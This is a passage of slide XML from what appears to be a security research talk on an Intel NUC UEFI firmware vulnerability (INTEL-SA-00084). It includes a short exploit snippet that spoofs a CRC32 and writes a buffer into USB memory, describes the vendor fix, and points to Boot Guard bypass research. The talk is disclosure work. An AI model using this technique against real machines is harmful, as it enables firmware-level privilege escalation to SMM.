            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># spoofing crc32, first 4 bytes will be modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>buffer = modify_buffer_crc32(buffer, 0, crc32)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mem_write(usb_data + 0x70, buf_size, buffer)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Shape 680"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>The fix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Shape 681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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686" name="Shape 686"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Shape 687"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656200" y="1556350"/>
            <a:ext cx="11225100" cy="4549800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>[INTEL-SA-00084]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The issue was patched by changing the initial value of CRC32 from the fixed to one that comes from IO port 1808 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Shape 688"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>The real fix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Shape 689"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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690" name="Shape 690"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731875" y="1584150"/>
            <a:ext cx="10480499" cy="17004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695" name="Shape 695"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660100" y="1559875"/>
            <a:ext cx="11070600" cy="370410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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Some NUCs have Intel Boot Guard turned on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, which can also be bypassed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" u="sng">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://embedi.com/blog/bypassing-intel-boot-guard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>[INTEL-SA-00084]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Regarding the Boot Guard, it’s not the only bypassing technique.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Alex Matrosov have already told about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>a security issues in the implementation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" u="sng">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/REhints/BlackHat_2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Shape 697"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Bypassing other protections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Shape 698"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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699" name="Shape 699"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776025" y="1939900"/>
            <a:ext cx="9233225" cy="19072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704" name="Shape 704"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Shape 705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Shape 706"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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07" name="Shape 707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731838" y="1556351"/>
            <a:ext cx="11482602" cy="1159690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>There are still highly critical vulnerabilities in UEFI BIOS firmware allowing a LPE to SMM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
